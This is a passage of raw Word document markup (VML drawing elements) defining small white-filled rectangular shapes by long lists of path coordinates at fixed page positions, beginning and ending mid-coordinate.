2305,10209,2305,10208,2305,10207,2305,10205,2305,10204,2305,10203,2305,10201,2305,10200,2305,10198,2305,10196,2305,10195,2305,10193,2305,10191,2305,10189,2305,10188,2305,10186,2305,10184,2305,10182,2305,10179,2305,10177,2305,10175,2305,10173,2305,10170,2305,10168,2305,10165,2305,10163,2305,10160,2305,10157,2305,10155,2305,10152,2305,10149,2305,10146,2305,10143,2305,10139,2305,10136,2305,10133,2305,10129,2305,10126,2305,10122,2305,10119,2305,10115,2305,10111,2305,10107,2305,10103,2305,10099,2305,10095,2305,10091,2305,10087,2305,10082,2305,10078,2305,10073,2305,10068,2305,10064,2305,10059,2305,10054,2305,10049,2305,10044,2305,10038,2305,10033,2305,10028,2305,10022,2305,10016,2305,10011,2305,10005,2305,9999,2305,9993,2305,9987,2305,9980,2305,9974e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:138.500pt;margin-top:497.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2770,9950" coordsize="130,270">
        <v:shape style="position:absolute;left:2770;top:9950;width:130;height:270" coordorigin="2770,9950" coordsize="130,270" path="m2785,9974l2785,9974,2785,9974,2785,9974,2785,9974,2785,9974,2785,9974,2785,9974,2785,9974,2785,9974,2785,9974,2785,9974,2785,9974,2786,9974,2786,9974,2786,9974,2786,9974,2786,9974,2786,9974,2786,9974,2786,9974,2786,9974,2786,9974,2786,9974,2786,9974,2786,9974,2787,9974,2787,9974,2787,9974,2787,9974,2787,9974,2787,9974,2788,9974,2788,9974,2788,9974,2788,9974,2788,9974,2789,9974,2789,9974,2789,9974,2790,9974,2790,9974,2790,9974,2791,9974,2791,9974,2791,9974,2792,9974,2792,9974,2793,9974,2793,9974,2794,9974,2794,9974,2795,9974,2795,9974,2796,9974,2797,9974,2797,9974,2798,9974,2799,9974,2799,9974,2800,9974,2801,9974,2802,9974,2802,9974,2803,9974,2804,9974,2805,9974,2806,9974,2807,9974,2808,9974,2809,9974,2810,9974,2811,9974,2812,9974,2813,9974,2814,9974,2815,9974,2817,9974,2818,9974,2819,9974,2821,9974,2822,9974,2823,9974,2825,9974,2826,9974,2828,9974,2829,9974,2831,9974,2832,9974,2834,9974,2836,9974,2837,9974,2839,9974,2841,9974,2843,9974,2845,9974,2846,9974,2848,9974,2850,9974,2852,9974,2855,9974,2857,9974,2859,9974,2861,9974,2863,9974,2866,9974,2868,9974,2870,9974,2873,9974,2875,9974,2878,9974,2880,9974,2883,9974,2885,9974,2888,9974,2891,9974,2894,9974,2897,9974,2900,9974,2902,9974,2905,9974,2905,9974,2905,9974,2905,9974,2905,9974,2905,9974,2905,9974,2905,9974,2905,9974,2905,9974,2905,9974,2905,9974,2905,9974,2905,9974,2905,9974,2905,9974,2905,9975,2905,9975,2905,9975,2905,9975,2905,9975,2905,9975,2905,9975,2905,9976,2905,9976,2905,9976,2905,9976,2905,9977,2905,9977,2905,9977,2905,9978,2905,9978,2905,9979,2905,9979,2905,9979,2905,9980,2905,9981,2905,9981,2905,9982,2905,9982,2905,9983,2905,9984,2905,9984,2905,9985,2905,9986,2905,9987,2905,9988,2905,9989,2905,9990,2905,9991,2905,9992,2905,9993,2905,9994,2905,9995,2905,9997,2905,9998,2905,9999,2905,10001,2905,10002,2905,10004,2905,10005,2905,10007,2905,10008,2905,10010,2905,10012,2905,10014,2905,10016,2905,10018,2905,10020,2905,10022,2905,10024,2905,10026,2905,10028,2905,10031,2905,10033,2905,10035,2905,10038,2905,10040,2905,10043,2905,10046,2905,10049,2905,10052,2905,10054,2905,10057,2905,10061,2905,10064,2905,10067,2905,10070,2905,10074,2905,10077,2905,10081,2905,10084,2905,10088,2905,10092,2905,10096,2905,10100,2905,10104,2905,10108,2905,10112,2905,10117,2905,10121,2905,10125,2905,10130,2905,10135,2905,10139,2905,10144,2905,10149,2905,10154,2905,10159,2905,10165,2905,10170,2905,10176,2905,10181,2905,10187,2905,10192,2905,10198,2905,10204,2905,10210,2905,10217,2905,10223,2905,10229,2905,10229,2905,10229,2905,10229,2905,10229,2905,10229,2905,10229,2905,10229,2905,10229,2905,10229,2905,10229,2905,10229,2905,10229,2905,10229,2905,10229,2905,10229,2905,10229,2905,10229,2905,10229,2905,10229,2905,10229,2905,10229,2905,10229,2905,10229,2905,10229,2904,10229,2904,10229,2904,10229,2904,10229,2904,10229,2904,10229,2904,10229,2903,10229,2903,10229,2903,10229,2903,10229,2902,10229,2902,10229,2902,10229,2902,10229,2901,10229,2901,10229,2901,10229,2900,10229,2900,10229,2899,10229,2899,10229,2899,10229,2898,10229,2898,10229,2897,10229,2897,10229,2896,10229,2895,10229,2895,10229,2894,10229,2894,10229,2893,10229,2892,10229,2892,10229,2891,10229,2890,10229,2889,10229,2888,10229,2888,10229,2887,10229,2886,10229,2885,10229,2884,10229,2883,10229,2882,10229,2881,10229,2880,10229,2879,10229,2878,10229,2877,10229,2875,10229,2874,10229,2873,10229,2872,10229,2870,10229,2869,10229,2868,10229,2866,10229,2865,10229,2863,10229,2862,10229,2860,10229,2859,10229,2857,10229,2855,10229,2854,10229,2852,10229,2850,10229,2848,10229,2846,10229,2844,10229,2842,10229,2840,10229,2838,10229,2836,10229,2834,10229,2832,10229,2830,10229,2828,10229,2825,10229,2823,10229,2821,10229,2818,10229,2816,10229,2813,10229,2811,10229,2808,10229,2805,10229,2803,10229,2800,10229,2797,10229,2794,10229,2791,10229,2788,10229,2785,10229,2785,10229,2785,10229,2785,10229,2785,10229,2785,10229,2785,10229,2785,10229,2785,10229,2785,10229,2785,10229,2785,10229,2785,10229,2785,10229,2785,10229,2785,10229,2785,10229,2785,10229,2785,10228,2785,10228,2785,10228,2785,10228,2785,10228,2785,10228,2785,10227,2785,10227,2785,10227,2785,10226,2785,10226,2785,10226,2785,10225,2785,10225,2785,10225,2785,10224,2785,10224,2785,10223,2785,10223,2785,10222,2785,10221,2785,10221,2785,10220,2785,10219,2785,10219,2785,10218,2785,10217,2785,10216,2785,10215,2785,10214,2785,10213,2785,10212,2785,10211,2785,10210,2785,10209,2785,10208,2785,10207,2785,10205,2785,10204,2785,10203,2785,10201,2785,10200,2785,10198,2785,10196,2785,10195,2785,10193,2785,10191,2785,10189,2785,10188,2785,10186,2785,10184,2785,10182,2785,10179,2785,10177,2785,10175,2785,10173,2785,10170,2785,10168,2785,10165,2785,10163,2785,10160,2785,10157,2785,10155,2785,10152,2785,10149,2785,10146,2785,10143,2785,10139,2785,10136,2785,10133,2785,10129,2785,10126,2785,10122,2785,10119,2785,10115,2785,10111,2785,10107,2785,10103,2785,10099,2785,10095,2785,10091,2785,10087,2785,10082,2785,10078,2785,10073,2785,10068,2785,10064,2785,10059,2785,10054,2785,10049,2785,10044,2785,10038,2785,10033,2785,10028,2785,10022,2785,10016,2785,10011,2785,10005,2785,9999,2785,9993,2785,9987,2785,9980,2785,9974e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:114.500pt;margin-top:529.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2290,10590" coordsize="130,270">
        <v:shape style="position:absolute;left:2290;top:10590;width:130;height:270" coordorigin="2290,10590" coordsize="130,270" path="m2305,10619l2305,10619,2305,10619,2305,10619,2305,10619,2305,10619,2305,10619,2305,10619,2305,10619,2305,10619,2305,10619,2305,10619,2305,10619,2305,10619,2305,10619,2305,10619,2305,10619,2305,10619,2306,10619,2306,10619,2306,10619,2306,10619,2306,10619,2306,10619,2306,10619,2306,10619,2306,10619,2306,10619,2307,10619,2307,10619,2307,10619,2307,10619,2307,10619,2307,10619,2308,10619,2308,10619,2308,10619,2308,10619,2309,10619,2309,10619,2309,10619,2310,10619,2310,10619,2310,10619,2311,10619,2311,10619,2312,10619,2312,10619,2313,10619,2313,10619,2314,10619,2314,10619,2315,10619,2315,10619,2316,10619,2316,10619,2317,10619,2318,10619,2318,10619,2319,10619,2320,10619,2321,10619,2321,10619,2322,10619,2323,10619,2324,10619,2325,10619,2326,10619,2327,10619,2328,10619,2329,10619,2330,10619,2331,10619,2332,10619,2333,10619,2334,10619,2335,10619,2336,10619,2338,10619,2339,10619,2340,10619,2342,10619,2343,10619,2344,10619,2346,10619,2347,10619,2349,10619,2350,10619,2352,10619,2354,10619,2355,10619,2357,10619,2359,10619,2361,10619,2362,10619,2364,10619,2366,10619,2368,10619,2370,10619,2372,10619,2374,10619,2376,10619,2379,10619,2381,10619,2383,10619,2385,10619,2388,10619,2390,10619,2392,10619,2395,10619,2397,10619,2400,10619,2403,10619,2405,10619,2408,10619,2411,10619,2414,10619,2416,10619,2419,10619,2422,10619,2425,10619,2425,10619,2425,10619,2425,10619,2425,10619,2425,10619,2425,10619,2425,10619,2425,10619,2425,10619,2425,10619,2425,10620,2425,10620,2425,10620,2425,10620,2425,10620,2425,10620,2425,10620,2425,10620,2425,10620,2425,10620,2425,10621,2425,10621,2425,10621,2425,10621,2425,10621,2425,10622,2425,10622,2425,10622,2425,10623,2425,10623,2425,10623,2425,10624,2425,10624,2425,10625,2425,10625,2425,10626,2425,10626,2425,10627,2425,10628,2425,10628,2425,10629,2425,10630,2425,10631,2425,10631,2425,10632,2425,10633,2425,10634,2425,10635,2425,10636,2425,10637,2425,10638,2425,10639,2425,10641,2425,10642,2425,10643,2425,10645,2425,10646,2425,10647,2425,10649,2425,10650,2425,10652,2425,10654,2425,10655,2425,10657,2425,10659,2425,10661,2425,10663,2425,10665,2425,10667,2425,10669,2425,10671,2425,10674,2425,10676,2425,10678,2425,10681,2425,10683,2425,10686,2425,10688,2425,10691,2425,10694,2425,10697,2425,10700,2425,10703,2425,10706,2425,10709,2425,10712,2425,10716,2425,10719,2425,10723,2425,10726,2425,10730,2425,10733,2425,10737,2425,10741,2425,10745,2425,10749,2425,10753,2425,10758,2425,10762,2425,10766,2425,10771,2425,10775,2425,10780,2425,10785,2425,10790,2425,10795,2425,10800,2425,10805,2425,10810,2425,10815,2425,10821,2425,10826,2425,10832,2425,10838,2425,10844,2425,10850,2425,10856,2425,10862,2425,10868,2425,10874,2425,10874,2425,10874,2425,10874,2425,10874,2425,10874,2425,10874,2425,10874,2425,10874,2425,10874,2425,10874,2425,10874,2425,10874,2425,10874,2425,10874,2425,10874,2425,10874,2425,10874,2425,10874,2425,10874,2425,10874,2425,10874,2425,10874,2424,10874,2424,10874,2424,10874,2424,10874,2424,10874,2424,10874,2424,10874,2423,10874,2423,10874,2423,10874,2423,10874,2423,10874,2422,10874,2422,10874,2422,10874,2422,10874,2421,10874,2421,10874,2421,10874,2420,10874,2420,10874,2420,10874,2419,10874,2419,10874,2418,10874,2418,10874,2417,10874,2417,10874,2416,10874,2416,10874,2415,10874,2415,10874,2414,10874,2413,10874,2413,10874,2412,10874,2411,10874,2411,10874,2410,10874,2409,10874,2408,10874,2407,10874,2407,10874,2406,10874,2405,10874,2404,10874,2403,10874,2402,10874,2401,10874,2400,10874,2399,10874,2398,10874,2396,10874,2395,10874,2394,10874,2393,10874,2391,10874,2390,10874,2389,10874,2387,10874,2386,10874,2384,10874,2383,10874,2381,10874,2380,10874,2378,10874,2377,10874,2375,10874,2373,10874,2372,10874,2370,10874,2368,10874,2366,10874,2364,10874,2362,10874,2360,10874,2358,10874,2356,10874,2354,10874,2352,10874,2350,10874,2347,10874,2345,10874,2343,10874,2340,10874,2338,10874,2335,10874,2333,10874,2330,10874,2328,10874,2325,10874,2322,10874,2320,10874,2317,10874,2314,10874,2311,10874,2308,10874,2305,10874,2305,10874,2305,10874,2305,10874,2305,10874,2305,10874,2305,10874,2305,10874,2305,10874,2305,10874,2305,10874,2305,10874,2305,10874,2305,10874,2305,10874,2305,10874,2305,10874,2305,10874,2305,10874,2305,10874,2305,10873,2305,10873,2305,10873,2305,10873,2305,10873,2305,10872,2305,10872,2305,10872,2305,10871,2305,10871,2305,10871,2305,10870,2305,10870,2305,10870,2305,10869,2305,10869,2305,10868,2305,10867,2305,10867,2305,10866,2305,10865,2305,10865,2305,10864,2305,10863,2305,10862,2305,10862,2305,10861,2305,10860,2305,10859,2305,10858,2305,10857,2305,10856,2305,10854,2305,10853,2305,10852,2305,10851,2305,10849,2305,10848,2305,10846,2305,10845,2305,10843,2305,10842,2305,10840,2305,10838,2305,10837,2305,10835,2305,10833,2305,10831,2305,10829,2305,10827,2305,10825,2305,10823,2305,10820,2305,10818,2305,10816,2305,10813,2305,10811,2305,10808,2305,10805,2305,10803,2305,10800,2305,10797,2305,10794,2305,10791,2305,10788,2305,10785,2305,10782,2305,10778,2305,10775,2305,10771,2305,10768,2305,10764,2305,10760,2305,10757,2305,10753,2305,10749,2305,10745,2305,10741,2305,10736,2305,10732,2305,10728,2305,10723,2305,10718,2305,10714,2305,10709,2305,10704,2305,10699,2305,10694,2305,10689,2305,10684,2305,10678,2305,10673,2305,10667,2305,10662,2305,10656,2305,10650,2305,10644,2305,10638,2305,10632,2305,10626,2305,10619e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:138.500pt;margin-top:529.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2770,10590" coordsize="130,270">
        <v:shape style="position:absolute;left:2770;top:10590;width:130;height:270" coordorigin="2770,10590" coordsize="130,270" path="m2785,10619l2785,10619,2785,10619,2785,10619,2785,10619,2785,10619,2785,10619,2785,10619,2785,10619,2785,10619,2785,10619,2785,10619,2785,10619,2786,10619,2786,10619,2786,10619,2786,10619,2786,10619,2786,10619,2786,10619,2786,10619,2786,10619,2786,10619,2786,10619,2786,10619,2786,10619,2787,10619,2787,10619,2787,10619,2787,10619,2787,10619,2787,10619,2788,10619,2788,10619,2788,10619,2788,10619,2788,10619,2789,10619,2789,10619,2789,10619,2790,10619,2790,10619,2790,10619,2791,10619,2791,10619,2791,10619,2792,10619,2792,10619,2793,10619,2793,10619,2794,10619,2794,10619,2795,10619,2795,10619,2796,10619,2797,10619,2797,10619,2798,10619,2799,10619,2799,10619,2800,10619,2801,10619,2802,10619,2802,10619,2803,10619,2804,10619,2805,10619,2806,10619,2807,10619,2808,10619,2809,10619,2810,10619,2811,10619,2812,10619,2813,10619,2814,10619,2815,10619,2817,10619,2818,10619,2819,10619,2821,10619,2822,10619,2823,10619,2825,10619,2826,10619,2828,10619,2829,10619,2831,10619,2832,10619,2834,10619,2836,10619,2837,10619,2839,10619,2841,10619,2843,10619,2845,10619,2846,10619,2848,10619,2850,10619,2852,10619,2855,10619,2857,10619,2859,10619,2861,10619,2863,10619,2866,10619,2868,10619,2870,10619,2873,10619,2875,10619,2878,10619,2880,10619,2883,10619,2885,10619,2888,10619,2891,10619,2894,10619,2897,10619,2900,10619,2902,10619,2905,10619,2905,10619,2905,10619,2905,10619,2905,10619,2905,10619,2905,10619,2905,10619,2905,10619,2905,10619,2905,10619,2905,10620,2905,10620,2905,10620,2905,10620,2905,10620,2905,10620,2905,10620,2905,10620,2905,10620,2905,10620,2905,10621,2905,10621,2905,10621,2905,10621,2905,10621,2905,10622,2905,10622,2905,10622,2905,10623,2905,10623,2905,10623,2905,10624,2905,10624,2905,10625,2905,10625,2905,10626,2905,10626,2905,10627,2905,10628,2905,10628,2905,10629,2905,10630,2905,10631,2905,10631,2905,10632,2905,10633,2905,10634,2905,10635,2905,10636,2905,10637,2905,10638,2905,10639,2905,10641,2905,10642,2905,10643,2905,10645,2905,10646,2905,10647,2905,10649,2905,10650,2905,10652,2905,10654,2905,10655,2905,10657,2905,10659,2905,10661,2905,10663,2905,10665,2905,10667,2905,10669,2905,10671,2905,10674,2905,10676,2905,10678,2905,10681,2905,10683,2905,10686,2905,10688,2905,10691,2905,10694,2905,10697,2905,10700,2905,10703,2905,10706,2905,10709,2905,10712,2905,10716,2905,10719,2905,10723,2905,10726,2905,10730,2905,10733,2905,10737,2905,10741,2905,10745,2905,10749,2905,10753,2905,10758,2905,10762,2905,10766,2905,10771,2905,10775,2905,10780,2905,10785,2905,10790,2905,10795,2905,10800,2905,10805,2905,10810,2905,10815,2905,10821,2905,10826,2905,10832,2905,10838,2905,10844,2905,10850,2905,10856,2905,10862,2905,10868,2905,10874,2905,10874,2905,10874,2905,10874,2905,10874,2905,10874,2905,10874,2905,10874,2905,10874,2905,10874,2905,10874,2905,10874,2905,10874,2905,10874,2905,10874,2905,10874,2905,10874,2905,10874,2905,10874,2905,10874,2905,10874,2905,10874,2905,10874,2905,10874,2905,10874,2904,10874,2904,10874,2904,10874,2904,10874,2904,10874,2904,10874,2904,10874,2903,10874,2903,10874,2903,10874,2903,10874,2902,10874,2902,10874,2902,10874,2902,10874,2901,10874,2901,10874,2901,10874,2900,10874,2900,10874,2899,10874,2899,10874,2899,10874,2898,10874,2898,10874,2897,10874,2897,10874,2896,10874,2895,10874,2895,10874,2894,10874,2894,10874,2893,10874,2892,10874,2892,10874,2891,10874,2890,10874,2889,10874,2888,10874,2888,10874,2887,10874,2886,10874,2885,10874,2884,10874,2883,10874,2882,10874,2881,10874,2880,10874,2879,10874,2878,10874,2877,10874,2875,10874,2874,10874,2873,10874,2872,10874,2870,10874,2869,10874,2868,10874,2866,10874,2865,10874,2863,10874,2862,10874,2860,10874,2859,10874,2857,10874,2855,10874,2854,10874,2852,10874,2850,10874,2848,10874,2846,10874,2844,10874,2842,10874,2840,10874,2838,10874,2836,10874,2834,10874,2832,10874,2830,10874,2828,10874,2825,10874,2823,10874,2821,10874,2818,10874,2816,10874,2813,10874,2811,10874,2808,10874,2805,10874,2803,10874,2800,10874,2797,10874,2794,10874,2791,10874,2788,10874,2785,10874,2785,10874,2785,10874,2785,10874,2785,10874,2785,10874,2785,10874,2785,10874,2785,10874,2785,10874,2785,10874,2785,10874,2785,10874,2785,10874,2785,10874,2785,10874,2785,10874,2785,10874,2785,10874,2785,10874,2785,10873,2785,10873,2785,10873,2785,10873,2785,10873,2785,10872,2785,10872,2785,10872,2785,10871,2785,10871,2785,10871,2785,10870,2785,10870,2785,10870,2785,10869,2785,10869,2785,10868,2785,10867,2785,10867,2785,10866,2785,10865,2785,10865,2785,10864,2785,10863,2785,10862,2785,10862,2785,10861,2785,10860,2785,10859,2785,10858,2785,10857,2785,10856,2785,10854,2785,10853,2785,10852,2785,10851,2785,10849,2785,10848,2785,10846,2785,10845,2785,10843,2785,10842,2785,10840,2785,10838,2785,10837,2785,10835,2785,10833,2785,10831,2785,10829,2785,10827,2785,10825,2785,10823,2785,10820,2785,10818,2785,10816,2785,10813,2785,10811,2785,10808,2785,10805,2785,10803,2785,10800,2785,10797,2785,10794,2785,10791,2785,10788,2785,10785,2785,10782,2785,10778,2785,10775,2785,10771,2785,10768,2785,10764,2785,10760,2785,10757,2785,10753,2785,10749,2785,10745,2785,10741,2785,10736,2785,10732,2785,10728,2785,10723,2785,10718,2785,10714,2785,10709,2785,10704,2785,10699,2785,10694,2785,10689,2785,10684,2785,10678,2785,10673,2785,10667,2785,10662,2785,10656,2785,10650,2785,10644,2785,10638,2785,10632,2785,10626,2785,10619e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:114.500pt;margin-top:561.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2290,11230" coordsize="130,270">
        <v:shape style="position:absolute;left:2290;top:11230;width:130;height:270" coordorigin="2290,11230" coordsize="130,270" path="m2305,11250l2305,11250,2305,11250,2305,11250,2305,11250,2305,11250,2305,11250,2305,11250,2305,11250,2305,11250,2305,11250,2305,11250,2305,11250,2305,11250,2305,11250,2305,11250,2305,11250,2305,11250,2306,11250,2306,11250,2306,11250,2306,11250,2306,11250,2306,11250,2306,11250,2306,11250,2306,11250,2306,11250,2307,11250,2307,11250,2307,11250,2307,11250,2307,11250,2307,11250,2308,11250,2308,11250,2308,11250,2308,11250,2309,11250,2309,11250,2309,11250,2310,11250,2310,11250,2310,11250,2311,11250,2311,11250,2312,11250,2312,11250,2313,11250,2313,11250,2314,11250,2314,11250,2315,11250,2315,11250,2316,11250,2316,11250,2317,11250,2318,11250,2318,11250,2319,11250,2320,11250,2321,11250,2321,11250,2322,11250,2323,11250,2324,11250,2325,11250,2326,11250,2327,11250,2328,11250,2329,11250,2330,11250,2331,11250,2332,11250,2333,11250,2334,11250,2335,11250,2336,11250,2338,11250,2339,11250,2340,11250,2342,11250,2343,11250,2344,11250,2346,11250,2347,11250,2349,11250,2350,11250,2352,11250,2354,11250,2355,11250,2357,11250,2359,11250,2361,11250,2362,11250,2364,11250,2366,11250,2368,11250,2370,11250,2372,11250,2374,11250,2376,11250,2379,11250,2381,11250,2383,11250,2385,11250,2388,11250,2390,11250,2392,11250,2395,11250,2397,11250,2400,11250,2403,11250,2405,11250,2408,11250,2411,11250,2414,11250,2416,11250,2419,11250,2422,11250,2425,11250,2425,11250,2425,11250,2425,11250,2425,11250,2425,11250,2425,11250,2425,11250,2425,11250,2425,11250,2425,11250,2425,11250,2425,11250,2425,11250,2425,11250,2425,11250,2425,11250,2425,11250,2425,11250,2425,11251,2425,11251,2425,11251,2425,11251,2425,11251,2425,11252,2425,11252,2425,11252,2425,11252,2425,11253,2425,11253,2425,11253,2425,11254,2425,11254,2425,11255,2425,11255,2425,11256,2425,11256,2425,11257,2425,11257,2425,11258,2425,11259,2425,11259,2425,11260,2425,11261,2425,11262,2425,11263,2425,11263,2425,11264,2425,11265,2425,11266,2425,11267,2425,11269,2425,11270,2425,11271,2425,11272,2425,11274,2425,11275,2425,11276,2425,11278,2425,11279,2425,11281,2425,11282,2425,11284,2425,11286,2425,11288,2425,11289,2425,11291,2425,11293,2425,11295,2425,11297,2425,11299,2425,11302,2425,11304,2425,11306,2425,11309,2425,11311,2425,11314,2425,11316,2425,11319,2425,11322,2425,11324,2425,11327,2425,11330,2425,11333,2425,11336,2425,11339,2425,11343,2425,11346,2425,11349,2425,11353,2425,11356,2425,11360,2425,11364,2425,11368,2425,11371,2425,11375,2425,11379,2425,11384,2425,11388,2425,11392,2425,11397,2425,11401,2425,11406,2425,11410,2425,11415,2425,11420,2425,11425,2425,11430,2425,11435,2425,11440,2425,11446,2425,11451,2425,11457,2425,11462,2425,11468,2425,11474,2425,11480,2425,11486,2425,11492,2425,11498,2425,11505,2425,11505,2425,11505,2425,11505,2425,11505,2425,11505,2425,11505,2425,11505,2425,11505,2425,11505,2425,11505,2425,11505,2425,11505,2425,11505,2425,11505,2425,11505,2425,11505,2425,11505,2425,11505,2425,11505,2425,11505,2425,11505,2425,11505,2424,11505,2424,11505,2424,11505,2424,11505,2424,11505,2424,11505,2424,11505,2423,11505,2423,11505,2423,11505,2423,11505,2423,11505,2422,11505,2422,11505,2422,11505,2422,11505,2421,11505,2421,11505,2421,11505,2420,11505,2420,11505,2420,11505,2419,11505,2419,11505,2418,11505,2418,11505,2417,11505,2417,11505,2416,11505,2416,11505,2415,11505,2415,11505,2414,11505,2413,11505,2413,11505,2412,11505,2411,11505,2411,11505,2410,11505,2409,11505,2408,11505,2407,11505,2407,11505,2406,11505,2405,11505,2404,11505,2403,11505,2402,11505,2401,11505,2400,11505,2399,11505,2398,11505,2396,11505,2395,11505,2394,11505,2393,11505,2391,11505,2390,11505,2389,11505,2387,11505,2386,11505,2384,11505,2383,11505,2381,11505,2380,11505,2378,11505,2377,11505,2375,11505,2373,11505,2372,11505,2370,11505,2368,11505,2366,11505,2364,11505,2362,11505,2360,11505,2358,11505,2356,11505,2354,11505,2352,11505,2350,11505,2347,11505,2345,11505,2343,11505,2340,11505,2338,11505,2335,11505,2333,11505,2330,11505,2328,11505,2325,11505,2322,11505,2320,11505,2317,11505,2314,11505,2311,11505,2308,11505,2305,11505,2305,11505,2305,11505,2305,11505,2305,11505,2305,11505,2305,11505,2305,11505,2305,11505,2305,11505,2305,11505,2305,11505,2305,11505,2305,11505,2305,11504,2305,11504,2305,11504,2305,11504,2305,11504,2305,11504,2305,11504,2305,11504,2305,11503,2305,11503,2305,11503,2305,11503,2305,11502,2305,11502,2305,11502,2305,11501,2305,11501,2305,11501,2305,11500,2305,11500,2305,11499,2305,11499,2305,11498,2305,11498,2305,11497,2305,11496,2305,11496,2305,11495,2305,11494,2305,11494,2305,11493,2305,11492,2305,11491,2305,11490,2305,11489,2305,11488,2305,11487,2305,11486,2305,11485,2305,11484,2305,11482,2305,11481,2305,11480,2305,11478,2305,11477,2305,11475,2305,11474,2305,11472,2305,11470,2305,11469,2305,11467,2305,11465,2305,11463,2305,11461,2305,11459,2305,11457,2305,11455,2305,11453,2305,11451,2305,11448,2305,11446,2305,11443,2305,11441,2305,11438,2305,11436,2305,11433,2305,11430,2305,11427,2305,11424,2305,11421,2305,11418,2305,11415,2305,11412,2305,11408,2305,11405,2305,11402,2305,11398,2305,11394,2305,11391,2305,11387,2305,11383,2305,11379,2305,11375,2305,11371,2305,11367,2305,11362,2305,11358,2305,11353,2305,11349,2305,11344,2305,11339,2305,11334,2305,11330,2305,11324,2305,11319,2305,11314,2305,11309,2305,11303,2305,11298,2305,11292,2305,11286,2305,11280,2305,11275,2305,11268,2305,11262,2305,11256,2305,11250e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:138.500pt;margin-top:561.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2770,11230" coordsize="130,270">
        <v:shape style="position:absolute;left:2770;top:11230;width:130;height:270" coordorigin="2770,11230" coordsize="130,270" path="m2785,11250l2785,11250,2785,11250,2785,11250,2785,11250,2785,11250,2785,11250,2785,11250,2785,11250,2785,11250,2785,11250,2785,11250,2785,11250,2786,11250,2786,11250,2786,11250,2786,11250,2786,11250,2786,11250,2786,11250,2786,11250,2786,11250,2786,11250,2786,11250,2786,11250,2786,11250,2787,11250,2787,11250,2787,11250,2787,11250,2787,11250,2787,11250,2788,11250,2788,11250,2788,11250,2788,11250,2788,11250,2789,11250,2789,11250,2789,11250,2790,11250,2790,11250,2790,11250,2791,11250,2791,11250,2791,11250,2792,11250,2792,11250,2793,11250,2793,11250,2794,11250,2794,11250,2795,11250,2795,11250,2796,11250,2797,11250,2797,11250,2798,11250,2799,11250,2799,11250,2800,11250,2801,11250,2802,11250,2802,11250,2803,11250,2804,11250,2805,11250,2806,11250,2807,11250,2808,11250,2809,11250,2810,11250,2811,11250,2812,11250,2813,11250,2814,11250,2815,11250,2817,11250,2818,11250,2819,11250,2821,11250,2822,11250,2823,11250,2825,11250,2826,11250,2828,11250,2829,11250,2831,11250,2832,11250,2834,11250,2836,11250,2837,11250,2839,11250,2841,11250,2843,11250,2845,11250,2846,11250,2848,11250,2850,11250,2852,11250,2855,11250,2857,11250,2859,11250,2861,11250,2863,11250,2866,11250,2868,11250,2870,11250,2873,11250,2875,11250,2878,11250,2880,11250,2883,11250,2885,11250,2888,11250,2891,11250,2894,11250,2897,11250,2900,11250,2902,11250,2905,11250,2905,11250,2905,11250,2905,11250,2905,11250,2905,11250,2905,11250,2905,11250,2905,11250,2905,11250,2905,11250,2905,11250,2905,11250,2905,11250,2905,11250,2905,11250,2905,11250,2905,11250,2905,11250,2905,11251,2905,11251,2905,11251,2905,11251,2905,11251,2905,11252,2905,11252,2905,11252,2905,11252,2905,11253,2905,11253,2905,11253,2905,11254,2905,11254,2905,11255,2905,11255,2905,11256,2905,11256,2905,11257,2905,11257,2905,11258,2905,11259,2905,11259,2905,11260,2905,11261,2905,11262,2905,11263,2905,11263,2905,11264,2905,11265,2905,11266,2905,11267,2905,11269,2905,11270,2905,11271,2905,11272,2905,11274,2905,11275,2905,11276,2905,11278,2905,11279,2905,11281,2905,11282,2905,11284,2905,11286,2905,11288,2905,11289,2905,11291,2905,11293,2905,11295,2905,11297,2905,11299,2905,11302,2905,11304,2905,11306,2905,11309,2905,11311,2905,11314,2905,11316,2905,11319,2905,11322,2905,11324,2905,11327,2905,11330,2905,11333,2905,11336,2905,11339,2905,11343,2905,11346,2905,11349,2905,11353,2905,11356,2905,11360,2905,11364,2905,11368,2905,11371,2905,11375,2905,11379,2905,11384,2905,11388,2905,11392,2905,11397,2905,11401,2905,11406,2905,11410,2905,11415,2905,11420,2905,11425,2905,11430,2905,11435,2905,11440,2905,11446,2905,11451,2905,11457,2905,11462,2905,11468,2905,11474,2905,11480,2905,11486,2905,11492,2905,11498,2905,11505,2905,11505,2905,11505,2905,11505,2905,11505,2905,11505,2905,11505,2905,11505,2905,11505,2905,11505,2905,11505,2905,11505,2905,11505,2905,11505,2905,11505,2905,11505,2905,11505,2905,11505,2905,11505,2905,11505,2905,11505,2905,11505,2905,11505,2905,11505,2905,11505,2904,11505,2904,11505,2904,11505,2904,11505,2904,11505,2904,11505,2904,11505,2903,11505,2903,11505,2903,11505,2903,11505,2902,11505,2902,11505,2902,11505,2902,11505,2901,11505,2901,11505,2901,11505,2900,11505,2900,11505,2899,11505,2899,11505,2899,11505,2898,11505,2898,11505,2897,11505,2897,11505,2896,11505,2895,11505,2895,11505,2894,11505,2894,11505,2893,11505,2892,11505,2892,11505,2891,11505,2890,11505,2889,11505,2888,11505,2888,11505,2887,11505,2886,11505,2885,11505,2884,11505,2883,11505,2882,11505,2881,11505,2880,11505,2879,11